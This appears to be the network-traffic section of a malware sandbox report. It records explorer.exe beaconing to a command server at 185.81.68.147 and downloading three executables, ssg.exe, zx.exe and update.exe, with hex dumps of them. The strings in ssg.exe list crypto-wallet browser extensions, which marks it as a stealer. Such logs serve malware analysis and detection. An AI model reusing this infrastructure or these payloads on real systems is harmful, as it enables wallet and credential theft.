                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.236634016 CET278OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 37
                                                                                                                                                                                                                        Dec 15, 2024 09:12:03.356776953 CET37OUTData Raw: 5a 59 44 4c 0a 18 54 4f 53 00 4b 53 4c 08 1f 52 49 71 7f 22 76 2d 64 4c 32 72 18 54 5a 5f 59 5c 42 48 03 4f 01
                                                                                                                                                                                                                        Data Ascii: ZYDLTOSKSLRIq"v-dL2rTZ_Y\BHO
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.842247009 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:03 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        2192.168.2.549706185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:04.964103937 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:05.084320068 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.407574892 CET315INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:05 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 98
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Data Raw: 08 4a 58 44 4c 46 5f 1c 4d 01 0f 56 1e 00 52 4c 03 08 1d 55 0d 54 18 12 11 56 4a 50 4e 5c 3b 38 01 48 5a 47 4c 47 5c 18 17 07 08 05 16 0e 54 1d 54 08 19 52 04 0f 4c 18 4d 1e 56 1c 5c 6e 3d 50 1e 59 10 41 46 03 19 1d 00 0c 07 1d 00 06 48 01 00 18 01 04 0f 19 10 43 06 51 43 06 1e 5d 1b 07 38 3a
                                                                                                                                                                                                                        Data Ascii: JXDLF_MVRLUTVJPN\;8HZGLG\TTRLMV\n=PYAFHCQC]8:


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        3192.168.2.549707185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:06.531620979 CET232OUTGET /ssg.exe HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859174013 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:07 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT
                                                                                                                                                                                                                        ETag: "4b200-629107cd804d2"
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Content-Length: 307712
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @<O H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859225988 CET1236INData Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00
                                                                                                                                                                                                                        Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Np
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859261990 CET448INData Raw: 62 00 32 00 31 00 69 00 59 00 58 00 51 00 4b 00 5a 00 6d 00 68 00 70 00 62 00 47 00 46 00 6f 00 5a 00 57 00 6c 00 74 00 5a 00 32 00 78 00 70 00 5a 00 32 00 35 00 6b 00 5a 00 47 00 74 00 71 00 5a 00 32 00 39 00 6d 00 61 00 32 00 4e 00 69 00 5a 00
                                                                                                                                                                                                                        Data Ascii: b21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859294891 CET1236INData Raw: 66 00 46 00 4e 00 68 00 64 00 48 00 56 00 79 00 62 00 6c 00 64 00 68 00 62 00 47 00 78 00 6c 00 64 00 41 00 70 00 6d 00 62 00 6d 00 70 00 6f 00 62 00 57 00 74 00 6f 00 61 00 47 00 31 00 72 00 59 00 6d 00 70 00 72 00 61 00 32 00 46 00 69 00 62 00
                                                                                                                                                                                                                        Data Ascii: fFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcH
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859349966 CET1236INData Raw: 48 68 58 70 45 fd 19 8f de 6c 87 94 7b f8 b7 52 73 d3 23 ab 4b 02 e2 72 1f 8f 57 e3 55 ab 2a 66 eb 28 07 b2 b5 c2 03 2f c5 7b 9a 86 37 08 a5 d3 28 87 f2 30 bf a5 b2 23 03 6a ba 02 16 82 5c ed cf 1c 2b 8a 79 b4 92 a7 07 f2 f0 f3 69 e2 a1 4e da f4
                                                                                                                                                                                                                        Data Ascii: HhXpEl{Rs#KrWU*f(/{7(0#j\+yiNe4b.S4U2u9`@q^nQ!>=>FMT]qoP`$@CwgB[8y|GB|+H2pZrNl8V=-9'6d
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859383106 CET1236INData Raw: 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 6f 00 63 00 65 00 73 00 73 00 20 00 57 00 68 00 65 00 72 00 65 00 20 00 53 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 65 00 73 00 73 00 69 00 6f 00 6e 00 49 00 64 00
                                                                                                                                                                                                                        Data Ascii: ocessInfoocess Where SProcessInfoessionId='cc||ww{{kkooTP`00gg}V++bMvvE@}}YYGGAg_E#Srr[u=jL&&Zl66A~?
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859416008 CET1236INData Raw: 3b ab 6b cb 1f 9d 45 f1 ac fa 58 ab 4b e3 03 93 20 30 fa 55 ad 76 6d f6 88 cc 76 91 f5 02 4c 25 4f e5 d7 fc c5 2a cb d7 26 35 44 80 b5 62 a3 8f de b1 5a 49 25 ba 1b 67 45 ea 0e 98 5d fe c0 e1 c3 2f 75 02 81 4c f0 12 8d 46 97 a3 6b d3 f9 c6 03 8f
                                                                                                                                                                                                                        Data Ascii: ;kEXK 0UvmvL%O*&5DbZI%gE]/uLFk_mzRY-Xt!Ii)DujyxX>k'qO f}:cJ1Q3`bSEdwk+pHhXElR{s#rKWfU*(/{70(#j\
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859452963 CET1236INData Raw: cc 4f 83 cc 34 5c 68 34 a5 f4 51 a5 e5 34 d1 e5 f1 08 f9 f1 71 93 e2 71 d8 73 ab d8 31 53 62 31 15 3f 2a 15 04 0c 08 04 c7 52 95 c7 23 65 46 23 c3 5e 9d c3 18 28 30 18 96 a1 37 96 05 0f 0a 05 9a b5 2f 9a 07 09 0e 07 12 36 24 12 80 9b 1b 80 e2 3d
                                                                                                                                                                                                                        Data Ascii: O4\h4Q4qqs1Sb1?*R#eF#^(07/6$=&'iN'uu,tX,.4-6nnZZ[RR;Mv;a}){R)>/q^/SSh, `@ y[[jjFg9Kr9JJLLXXJk*O
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859566927 CET1236INData Raw: 4a 00 74 00 62 00 32 00 35 00 35 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 46 00 6c 00 59 00 57 00 4e 00 6f 00 61 00 32 00 35 00 74 00 5a 00 57 00 5a 00 77 00 61 00 47 00 56 00 77 00 59 00 32 00 4e 00 70 00 62 00 32 00 35 00
                                                                                                                                                                                                                        Data Ascii: Jtb255V2FsbGV0CmFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfENvaW45OFdhbGxldApjZ2Vlb2RwZmFnamNlZWZpZWZsbWRmcGhwbGtlbmxma3xU
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.859601974 CET1236INData Raw: 63 00 47 00 56 00 6a 00 59 00 57 00 46 00 6b 00 5a 00 32 00 5a 00 69 00 59 00 32 00 64 00 6e 00 5a 00 6d 00 70 00 6d 00 62 00 6d 00 31 00 38 00 54 00 57 00 46 00 70 00 59 00 58 00 4a 00 45 00 5a 00 55 00 5a 00 70 00 56 00 32 00 46 00 73 00 62 00
                                                                                                                                                                                                                        Data Ascii: cGVjYWFkZ2ZiY2dnZmpmbm18TWFpYXJEZUZpV2FsbGV0CmJoZ2hvYW1hcGNkcGJvaHBoaWdvb29hZGRpbnBrYmFpfEF1dGhlbnRpY2F0b3IKb29ramxia2lpam
                                                                                                                                                                                                                        Dec 15, 2024 09:12:07.979406118 CET1236INData Raw: 61 00 57 00 39 00 6f 00 5a 00 57 00 35 00 72 00 61 00 6d 00 6c 00 69 00 62 00 6d 00 31 00 68 00 5a 00 47 00 70 00 70 00 5a 00 57 00 68 00 71 00 61 00 47 00 46 00 71 00 59 00 6e 00 78 00 5a 00 62 00 33 00 4a 00 76 00 61 00 56 00 64 00 68 00 62 00
                                                                                                                                                                                                                        Data Ascii: aW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tam


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        4192.168.2.549708185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:09.172729969 CET231OUTGET /zx.exe HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502324104 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:09 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        Last-Modified: Sat, 14 Dec 2024 13:10:00 GMT
                                                                                                                                                                                                                        ETag: "5a4536-6293aaa2cd4c8"
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Content-Length: 5915958
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 a8 83 5d 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 dd 61 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd]g"(X@aZ`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502350092 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.LHuHVHM
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502367020 CET1236INData Raw: 48 83 c4 20 41 5f 41 5e 5e c3 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cf e8 53 e5 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 00 a4 02 00 48 8d 0d 35 a4 02 00 e8 a4 12 00 00 e9 bb 00 00 00 8b 4e 0c e8 a7 2c 01 00 4c 8b f0 48 85 c0 75 20 44 8b 4e
                                                                                                                                                                                                                        Data Ascii: H A_A^^VE3HISyLFHH5N,LHu DNLFH H-t~uME3HIc^Hl$@IH|$HLd$PHt8A fDI;HMAIGHHnHrBHH+u3H|$HHl$@Ld$PtI
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502454996 CET1236INData Raw: 0c 48 89 b4 24 a8 00 00 00 88 84 24 83 00 00 00 e8 35 5d 00 00 48 8b f0 48 85 c0 0f 84 37 02 00 00 45 33 c0 48 8b d0 48 8b cf e8 6f e0 00 00 85 c0 79 18 48 8d 15 20 a0 02 00 48 8d 0d 55 9f 02 00 e8 c4 0d 00 00 e9 0d 02 00 00 4c 8b cf 48 8d 4c 24
                                                                                                                                                                                                                        Data Ascii: H$$5]HH7E3HHoyH HULHL$ XAHsHH_`n'HHuHH(_LLHD$(H D$(LL$8D$,LD$,@
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502672911 CET896INData Raw: c0 48 89 44 24 50 b9 00 02 00 00 48 8b 47 08 48 89 6c 24 48 48 89 44 24 40 c7 44 24 38 00 00 00 80 c7 44 24 30 00 00 00 80 c7 44 24 28 00 00 00 80 c7 44 24 20 00 00 00 80 ff 15 47 95 02 00 48 89 6c 24 58 4c 8d 05 cb 9c 02 00 48 89 87 38 20 00 00
                                                                                                                                                                                                                        Data Ascii: HD$PHGHl$HHD$@D$8D$0D$(D$ GHl$XLH8 HHAPHD$P3HGHD$HHD$@D$8D$0D$(D$ LP E3HOH@ ULP HOA9LP H( rA
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502688885 CET1236INData Raw: d3 ff 15 57 92 02 00 0f b7 54 24 3c 66 2b 54 24 34 eb 05 ba 14 00 00 00 0f b7 8e 60 20 00 00 44 0f b7 8e 5e 20 00 00 66 3b d1 0f b7 c1 c7 44 24 28 01 00 00 00 66 0f 43 c2 89 4c 24 20 0f b7 96 58 20 00 00 48 8b 8e 28 20 00 00 44 8b c2 0f b7 d8 ff
                                                                                                                                                                                                                        Data Ascii: WT$<f+T$4` D^ f;D$(fCL$ X H( D7X D$(f\$ f^ f+f+H0 DDX AD$(ffDf+f+\ f+f+f+DH8 DDT$ Z
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502705097 CET1236INData Raw: 48 8d 94 24 30 04 00 00 ff 15 3c 8d 02 00 eb 12 4c 8d 05 8b 95 02 00 48 8d 54 24 30 ff 15 30 8d 02 00 48 8b 8c 24 30 0c 00 00 48 33 cc e8 c0 91 00 00 48 81 c4 48 0c 00 00 5f 5b c3 cc cc cc cc cc cc 4c 8b dc 49 89 4b 08 49 89 53 10 4d 89 43 18 4d
                                                                                                                                                                                                                        Data Ascii: H$0<LHT$00H$0H3HH_[LIKISMCMK SWHHH]H3H$0HI{FH|$(HT$0LHD$ AHHA0LHT$03H$0H3$HH_[HT$LD$LL$ SV
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502720118 CET1236INData Raw: 0f 84 5f 01 00 00 48 8b c8 48 89 6c 24 60 48 8b 05 e1 12 04 00 4c 8b cb 4c 8b c6 4c 89 74 24 20 49 8b d7 41 8b ee ff 15 e2 88 02 00 4c 8b f8 48 85 c0 0f 84 08 01 00 00 85 ff 75 18 48 8b c8 48 8b 05 c8 12 04 00 ff 15 c2 88 02 00 48 8b e8 e9 c7 00
                                                                                                                                                                                                                        Data Ascii: _HHl$`HLLLt$ IALHuHHHHHHHHIHHH}HH`HHHIIHHLHH)HHH$
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502737045 CET1236INData Raw: 00 00 e9 b5 fe ff ff 49 8b d6 48 8d 0d 41 8e 02 00 e8 b4 f5 ff ff 48 8b 05 ad 0d 04 00 ff 15 17 84 02 00 b8 ff ff ff ff e9 8f fe ff ff 48 8d 0d de 8d 02 00 e8 91 f5 ff ff b8 ff ff ff ff e9 79 fe ff ff 48 8d 0d 90 8d 02 00 e8 7b f5 ff ff b8 ff ff
                                                                                                                                                                                                                        Data Ascii: IHAHHyH{c@SH Hb*u8H00+u%HS'uH(uHH [6H [@SAV0H+HHH3H$0H$1E3HH$(1
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.502968073 CET1236INData Raw: e8 71 86 00 00 48 2b e0 48 8b 05 37 ab 03 00 48 33 c4 48 89 84 24 60 20 00 00 48 8b f9 b9 02 00 00 00 e8 df 11 01 00 48 8b c8 33 d2 e8 69 12 01 00 48 8d 4f 10 e8 ac fe ff ff 85 c0 79 0c 48 c7 c0 ff ff ff ff e9 d6 01 00 00 48 8d 4f 10 48 89 9c 24
                                                                                                                                                                                                                        Data Ascii: qH+H7H3H$` HH3iHOyHHOH$ H HHHLOLhH$ L$ L A ! II;{oukAHHK}uHC%H
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.622824907 CET1236INData Raw: 48 8d 8f 18 20 00 00 e8 36 2b 00 00 48 8d 8f 22 20 00 00 e8 da 44 00 00 85 c0 79 53 48 8b cf e8 fe 47 00 00 48 8d 8f 22 20 00 00 e8 c2 44 00 00 85 c0 79 3b 80 bf 31 30 00 00 00 48 8d 97 22 20 00 00 74 1f 48 8d 0d af 86 02 00 e8 d2 eb ff ff 48 8d
                                                                                                                                                                                                                        Data Ascii: H 6+H" DySHGH" Dy;10H" tHH tH3H WH u#E3E333NyE3HL$ E33CyHKHHH ,H a*TH


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        5192.168.2.549720185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:20.651216984 CET235OUTGET /update.exe HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983059883 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:21 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 06:09:39 GMT
                                                                                                                                                                                                                        ETag: "4ba00-62948e8bd5049"
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Content-Length: 309760
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 eb 5a 12 27 8a 34 41 27 8a 34 41 27 8a 34 41 2e f2 a7 41 24 8a 34 41 27 8a 35 41 2d 8a 34 41 48 fc 9f 41 2d 8a 34 41 48 fc ae 41 26 8a 34 41 48 fc a9 41 26 8a 34 41 52 69 63 68 27 8a 34 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 92 72 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 34 00 00 00 00 00 00 18 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$cZ'4A'4A'4A.A$4A'5A-4AHA-4AHA&4AHA&4ARich'4APEdr^g":44@@pr((LPX.text8: `.rdata#P$>@@.data@.pdataLb@@.rsrc(f@@.x64PPj
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983117104 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89 54
                                                                                                                                                                                                                        Data Ascii: T$HL$HHD$ HD$HD$=MZt3VHD$Hc@<HL$ HHH$HD$ H9$s3/D$(HL$ HH9$v3H$8PEt3H$HHL$H8HIj?HI
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983175039 CET1236INData Raw: 24 20 85 c0 75 07 b8 20 00 00 00 eb 02 33 c0 48 83 c4 50 5f c3 cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 ff 15 83 3b 00 00 48 89 44 24 28 48 8b 54 24 48 48 8b 4c 24 28 ff 15 36 3b 00 00 48 89 44 24 20 48 8b 44 24 20 48 83
                                                                                                                                                                                                                        Data Ascii: $ u 3HP_HT$HL$H8HL$@;HD$(HT$HHL$(6;HD$ HD$ H8HT$HL$H8HL$@kHD$(HT$HHL$(kHD$ HD$ H8HHH)EHD$0H%EHD$ H1EHjH;EHkH
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983208895 CET1236INData Raw: 05 e3 69 00 00 48 8d 15 6c 47 00 00 48 8d 0d 75 47 00 00 e8 7c fb ff ff 48 89 05 d1 69 00 00 48 8d 15 72 47 00 00 48 8d 0d 7b 47 00 00 e8 62 fb ff ff 48 89 05 bf 69 00 00 48 8d 15 78 47 00 00 48 8d 0d 81 47 00 00 e8 48 fb ff ff 48 89 05 ad 69 00
                                                                                                                                                                                                                        Data Ascii: iHlGHuG|HiHrGH{GbHiHxGHGHHiH~GHG.HiHGHGHiHGHGHwiHGHGHeiHGHGHSiHGHGHAiH
                                                                                                                                                                                                                        Dec 15, 2024 09:12:21.983246088 CET1236INData Raw: 0d 2f 49 00 00 e8 b6 f6 ff ff 48 89 05 63 63 00 00 48 8d 15 2c 49 00 00 48 8d 0d 35 49 00 00 e8 9c f6 ff ff 48 89 05 51 63 00 00 48 8d 15 32 49 00 00 48 8d 0d 3b 49 00 00 e8 82 f6 ff ff 48 89 05 7f 62 00 00 48 8d 15 38 49 00 00 48 8d 0d 49 49 00
                                                                                                                                                                                                                        Data Ascii: /IHccH,IH5IHQcH2IH;IHbH8IHIIhH-cHFIHOINHcHLIH]I4HcHZIHkIH_cHhIHyIHMcHvIHIH;cH|IHI
